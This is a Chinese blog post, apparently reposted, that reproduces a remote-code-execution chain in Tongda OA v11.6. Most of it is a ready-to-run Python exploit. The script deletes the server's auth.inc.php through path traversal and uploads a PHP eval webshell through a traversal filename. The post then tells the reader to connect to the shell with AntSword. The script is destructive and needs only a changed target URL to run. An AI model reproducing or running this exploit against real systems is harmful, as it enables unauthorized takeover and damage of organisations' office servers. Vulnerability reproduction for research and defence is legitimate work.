zoukankan      html  css  js  c++  java
  • 通达OAv11.6RCE漏洞复现

    本漏洞是任意文件删除配合任意文件上传RCE,通达OA高危漏洞影响版本:

    文件删除漏洞:通达OA V11.6

    任意文件上传:通达OA < V11.7

    结合任意用户登录利用链:通达OA < V11.5

    复现版本:v11.6,警告:这个EXP会删除服务器上的文件,谨慎使用,后果自负。

     

     EXP:

    import requests
    
    target="http://localhost/"
    payload="<?php eval($_POST['hahaha']);?>"
    print("[*]Warning,This exploit code will DELETE auth.inc.php which may damage the OA")
    input("Press enter to continue")
    print("[*]Deleting auth.inc.php....")
    
    url=target+"/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php"
    requests.get(url=url)
    print("[*]Checking if file deleted...")
    url=target+"/inc/auth.inc.php"
    page=requests.get(url=url).text
    if 'No input file specified.' not in page:
        print("[-]Failed to deleted auth.inc.php")
        exit(-1)
    print("[+]Successfully deleted auth.inc.php!")
    print("[*]Uploading payload...")
    url=target+"/general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./"
    files = {'FILE1': ('deconf.php', payload)}
    requests.post(url=url,files=files)
    url=target+"/_deconf.php"
    page=requests.get(url=url).text
    if 'No input file specified.' not in page:
        print("[+]Filed Uploaded Successfully")
        print("[+]URL:",url)
    else:
        print("[-]Failed to upload file")

    修改EXP中的target

    python rce.py

     

     http://localhost//_deconf.php就是生成的一句话木马,密码为hahaha

    蚁剑连接

     

     

     

  • 相关阅读:
    topcoder srm 681 div1
    topcoder srm 683 div1
    topcoder srm 684 div1
    topcoder srm 715 div1
    topcoder srm 685 div1
    topcoder srm 687 div1
    topcoder srm 688 div1
    topcoder srm 689 div1
    topcoder srm 686 div1
    topcoder srm 690 div1 -3
  • 原文地址:https://www.cnblogs.com/rnss/p/13539532.html
Copyright © 2011-2022 走看看